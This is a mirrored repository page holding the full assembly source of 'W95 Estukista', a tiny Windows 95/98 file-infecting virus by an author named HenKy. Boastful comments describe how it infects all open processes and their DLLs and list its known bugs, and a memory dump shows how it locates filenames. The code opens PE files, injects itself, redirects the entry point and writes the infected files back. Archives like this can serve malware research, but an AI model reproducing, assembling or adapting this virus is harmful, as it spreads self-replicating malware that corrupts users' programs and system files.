mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-21 02:46:10 +00:00
232 lines
8.3 KiB
NASM
232 lines
8.3 KiB
NASM
|
;-------------------------------- W95 ESTUKISTA BY HenKy -----------------------------
|
|||
|
;
|
|||
|
;-AUTHOR: HenKy
|
|||
|
;
|
|||
|
;-MAIL: HenKy_@latinmail.com
|
|||
|
;
|
|||
|
;-ORIGIN: SPAIN
|
|||
|
;
|
|||
|
|
|||
|
; VIRUS_SIZE = 126 BYTES!!!!
|
|||
|
|
|||
|
; 100% FUNCTIONAL UNDER W95/98 !!!!! AND IS RING 3!!!!!!
|
|||
|
|
|||
|
; (NOT TESTED UNDER ME)
|
|||
|
|
|||
|
; INFECTS *ALL* OPEN PROCESES AND EVEN ALL DLL AND MODULES IMPORTED BY THEM
|
|||
|
|
|||
|
; THE 0C1000000H ADDRESS IS USED AS BUFFER BECOZ WE HAVE WRITE/READ PRIVILEGES
|
|||
|
|
|||
|
; THE BFF712B9h ADDRESS IS THE CALL VINT21
|
|||
|
|
|||
|
; THE INITIAL ESI VALUE POINTS TO A READABLE MEMORY ZONE (SEEMS TO BE A CACHE ONE
|
|||
|
|
|||
|
; WHERE WINDOWS LOADS THE PE HEADER, THE IMPORTANT THING IS THAT HERE U CAN FIND
|
|||
|
|
|||
|
; THE FILENAMES WITH COMPLETE PATH OF ALL OPEN PROCESES)
|
|||
|
|
|||
|
|
|||
|
;BUGS: * THE BAD THING IS THAT ESI INITIAL VALUE ON SOME FILES POINTS TO KERNEL, CAUSING
|
|||
|
; THAT NO FILENAME FOUND (VIRUS WILL INFECT NOTHING AND WILL RETURN TO HOST).
|
|||
|
|
|||
|
; * ANOTHER POSSIBLE BUG IS THAT 0C1000000H MAYBE NOT READ/WRITE ON ALL COMPUTERS
|
|||
|
; (AT LEAST IN MY W95 AND W98 WORKS FINE, AND INTO COMPUTER'S FRIEND WITH 98 WORKS TOO)
|
|||
|
|
|||
|
; * AND THE MORE PAINLY THING IS THE MASK LIMIT.... IF VERY LOW-> LESS INFECTIOUS
|
|||
|
; IF VERY HIGH-> RISK OF READ NON-MAPPED AREA (AS WE ARE IN RING 3 IT WILL HANG WINDOZE)
|
|||
|
|
|||
|
; ANYWAY IN MY TESTS A LOT OF FILES BECOME INFECTED , MANY OF THEM WINDOWS DLL'S
|
|||
|
|
|||
|
|
|||
|
;DUMP OF INITIAL ESI VALUE OF MY COMPILED BINARY (I HAVE AN OPEN PROCESS CALLED AZPR.EXE)
|
|||
|
|
|||
|
|
|||
|
|
|||
|
;81621788 FF FF FF FF 04 00 00 00 00 00 00 00 00 00 00 00 ????
|
|||
|
;81621798 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|
|||
|
;816217A8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|
|||
|
;816217B8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|
|||
|
;816217C8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|
|||
|
;816217D8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|
|||
|
;816217E8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|
|||
|
;816217F8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|
|||
|
;81621808 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|
|||
|
;81621818 00 00 00 00 00 00 00 00 20 00 00 A0 43 3A 5C 57 C:\W
|
|||
|
;81621828 49 4E 50 52 4F 47 5C 41 5A 50 52 5C 41 5A 50 52 INPROG\AZPR\AZPR
|
|||
|
;81621838 2E 45 58 45 20 00 00 00 48 00 00 A0 44 00 00 00 .EXE H D
|
|||
|
|
|||
|
; ....
|
|||
|
|
|||
|
;81621CD8 50 A0 D7 82 3C 02 00 A0 50 45 00 00 4C 01 08 00 P ??< PE L
|
|||
|
;81621CE8 A0 95 37 39 00 00 00 00 00 00 00 00 E0 00 82 01 ?79 <20> ?
|
|||
|
;81621CF8 0B 01 02 12 00 22 02 00 00 A8 00 00 00 50 05 00 " <20> P
|
|||
|
;81621D08 01 40 0B 00 00 10 00 00 00 40 02 00 00 00 40 00 @ @ @
|
|||
|
;81621D18 00 10 00 00 00 02 00 00 01 00 0B 00 00 00 00 00
|
|||
|
;81621D28 04 00 00 00 00 00 00 00 00 90 0C 00 00 04 00 00 <20>
|
|||
|
;81621D38 00 00 00 00 02 00 00 00 00 00 04 00 00 00 01 00
|
|||
|
;81621D48 00 20 00 00 00 10 00 00 00 00 00 00 10 00 00 00
|
|||
|
;81621D58 00 00 00 00 00 00 00 00 64 54 0B 00 D4 01 00 00 dT ?
|
|||
|
;81621D68 00 A0 08 00 00 94 02 00 00 00 00 00 00 00 00 00 ?
|
|||
|
;81621D78 00 00 00 00 00 00 00 00 CC 52 0B 00 08 00 00 00 ?R
|
|||
|
;81621D88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|
|||
|
;81621D98 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|
|||
|
;81621DA8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|
|||
|
;81621DB8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|
|||
|
;81621DC8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 00
|
|||
|
;81621DD8 2E 74 65 78 74 00 00 00 00 30 02 00 00 10 00 00 .text 0
|
|||
|
;81621DE8 00 C0 00 00 00 04 00 00 00 00 00 00 00 00 00 00 ?
|
|||
|
;81621DF8 00 00 00 00 40 00 00 C0 2E 69 64 61 74 61 00 00 @ ?.idata
|
|||
|
;81621E08 00 20 00 00 00 40 02 00 00 04 00 00 00 C4 00 00 @ ?
|
|||
|
;81621E18 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 @ ?
|
|||
|
|
|||
|
; ....
|
|||
|
|
|||
|
;81621E38 00 1C 00 00 00 C8 00 00 00 00 00 00 00 00 00 00 ?
|
|||
|
;81621E48 00 00 00 00 40 00 00 C0 2E 62 73 73 00 00 00 00 @ ?.bss
|
|||
|
;81621E58 00 50 05 00 00 00 03 00 00 50 05 00 00 00 00 00 P P
|
|||
|
;81621E68 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 @ ?
|
|||
|
;81621E78 2E 72 65 6C 6F 63 00 00 00 50 00 00 00 50 08 00 .reloc P P
|
|||
|
;81621E88 00 00 00 00 00 E4 00 00 00 00 00 00 00 00 00 00 <20>
|
|||
|
;81621E98 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 @ ?.rsrc
|
|||
|
;81621EA8 00 A0 02 00 00 A0 08 00 00 9A 01 00 00 E4 00 00 <20> <20>
|
|||
|
;81621EB8 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 @ ?
|
|||
|
;81621EC8 61 73 70 72 00 00 00 00 00 40 01 00 00 40 0B 00 aspr @ @
|
|||
|
;81621ED8 00 3A 01 00 00 7E 02 00 00 00 00 00 00 00 00 00 : ~
|
|||
|
;81621EE8 00 00 00 00 50 08 00 C0 2E 64 61 74 61 00 00 00 P ?.data
|
|||
|
;81621EF8 00 10 00 00 00 80 0C 00 00 00 00 00 00 B8 03 00 ? <20>
|
|||
|
;81621F08 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 @ ?
|
|||
|
;81621F18 40 00 00 A0 00 00 00 00 E0 1C 62 81 FF FF FF FF @ <20>b<>????
|
|||
|
;81621F28 E0 13 62 81 F0 13 62 81 18 00 08 00 8F 02 00 00 <20>b<><62>b<> <20>
|
|||
|
;81621F38 08 00 00 00 00 00 00 00 00 00 40 00 D7 2B 01 00 @ ?+
|
|||
|
;81621F48 30 23 62 81 5C 1F 62 81 18 00 6C 1F 62 81 08 00 0#b<>\b<> lb<>
|
|||
|
;81621F58 20 00 00 A0 43 3A 5C 57 49 4E 50 52 4F 47 5C 41 C:\WINPROG\A
|
|||
|
;81621F68 5A 50 52 5C 41 5A 50 52 2E 45 58 45 00 CC CC CC ZPR\AZPR.EXE ???
|
|||
|
;81621F78 B4 03 00 A0 4E 45 01 00 00 00 00 00 00 00 8C 03 <20> NE <20>
|
|||
|
|
|||
|
; ....
|
|||
|
|
|||
|
|
|||
|
.586P
|
|||
|
PMMX ; WORF... ... JEJEJE
|
|||
|
.MODEL FLAT
|
|||
|
LOCALS
|
|||
|
|
|||
|
EXTRN ExitProcess:PROC
|
|||
|
MIX_SIZ EQU (FILE_END - MEGAMIX)
|
|||
|
|
|||
|
MACROSIZE MACRO
|
|||
|
DB MIX_SIZ/00100 mod 10 + "0"
|
|||
|
DB MIX_SIZ/00010 mod 10 + "0"
|
|||
|
DB MIX_SIZ/00001 mod 10 + "0"
|
|||
|
ENDM
|
|||
|
.DATA
|
|||
|
|
|||
|
DB 0
|
|||
|
|
|||
|
DB 'SIZE = '
|
|||
|
MACROSIZE
|
|||
|
|
|||
|
.CODE
|
|||
|
|
|||
|
|
|||
|
MEGAMIX:
|
|||
|
; EAX: EIP
|
|||
|
; ESI: BUFFER
|
|||
|
|
|||
|
|
|||
|
VINT21:
|
|||
|
DD 0BFF712B9h ; MOV ECX,048BFF71H ;-) Z0MBiE
|
|||
|
DB 'H' ; HenKy ;P
|
|||
|
XCHG EDI, EAX ; EDI: DELTA
|
|||
|
MOV EDX,ESI ; EDX=ESI: CACHE BUFFER (ESPORE BUG)
|
|||
|
MOV ESI,0C1000000H ; ESI: MY DATA BUFFER
|
|||
|
MOV EBP,EDI ; NOW: EBP=EDI=DELTA=INT21H
|
|||
|
|
|||
|
;EDX: POINTER TO FNAME
|
|||
|
|
|||
|
;LEA EDX,POPOPOP ; FOR DEBUG ONLY
|
|||
|
;JMP KAA
|
|||
|
|
|||
|
MOV ECX,28000 ; LIMIT
|
|||
|
PUSHAD
|
|||
|
|
|||
|
AMIMELASUDA:
|
|||
|
|
|||
|
POPAD
|
|||
|
PORK:
|
|||
|
INC EDX
|
|||
|
CMP WORD PTR [EDX],':C'
|
|||
|
JE KAA
|
|||
|
LOOP PORK
|
|||
|
|
|||
|
|
|||
|
WARNING:
|
|||
|
PUSH 00401000H ; ANOTHER ESPORE BUG CORRECTED :)
|
|||
|
RET
|
|||
|
|
|||
|
KAA:
|
|||
|
PUSHAD
|
|||
|
MOV AX, 3D02h ; open
|
|||
|
CALL [EDI]
|
|||
|
JC AMIMELASUDA
|
|||
|
XCHG EBX, EAX
|
|||
|
MOV EDX,ESI
|
|||
|
XOR ECX,ECX
|
|||
|
MOV CH,4H
|
|||
|
MOV AH, 3Fh ;read
|
|||
|
CALL [EDI]
|
|||
|
MOV EAX, [EDX+3Ch]
|
|||
|
ADD EAX,EDX
|
|||
|
MOV EDI,EAX
|
|||
|
PUSH 32
|
|||
|
POP ECX
|
|||
|
|
|||
|
DEPOTA:
|
|||
|
INC EDI
|
|||
|
CMP BYTE PTR [EDI],'B'; HEHEHEHE
|
|||
|
JE GOSTRO
|
|||
|
JMP DEPOTA
|
|||
|
GOSTRO:
|
|||
|
INC EDI
|
|||
|
PUSH EDI
|
|||
|
MOV ESI,EBP
|
|||
|
REP MOVSD
|
|||
|
MOV ESI,EDI
|
|||
|
POP EDI
|
|||
|
SUB EDI,EDX
|
|||
|
XCHG DWORD PTR [EAX+28H],EDI
|
|||
|
CMP DI,1024
|
|||
|
JB CLOZ
|
|||
|
ADD EDI,[EAX+34H]
|
|||
|
XCHG DWORD PTR [ESI-MONGORE],EDI
|
|||
|
|
|||
|
PUSH EBP
|
|||
|
POP EDI
|
|||
|
XOR EAX,EAX
|
|||
|
PUSHAD
|
|||
|
MOV AH, 42h
|
|||
|
CDQ
|
|||
|
CALL [EDI]
|
|||
|
POPAD
|
|||
|
MOV CH,4H
|
|||
|
MOV AH,40H ; write
|
|||
|
CALL [EDI]
|
|||
|
CLOZ:
|
|||
|
MOV AH,3EH ; close
|
|||
|
CALL [EDI]
|
|||
|
JMP AMIMELASUDA
|
|||
|
|
|||
|
FILE_END:
|
|||
|
|
|||
|
DW 0 ;-P
|
|||
|
|
|||
|
MONGORE EQU 95 ; OLD_EIP
|
|||
|
|
|||
|
PUSH 0
|
|||
|
CALL ExitProcess
|
|||
|
|
|||
|
;POPOPOP DB "H:\PRUEBAS\TEST.ZZZ",0
|
|||
|
|
|||
|
END MEGAMIX
|
|||
|
|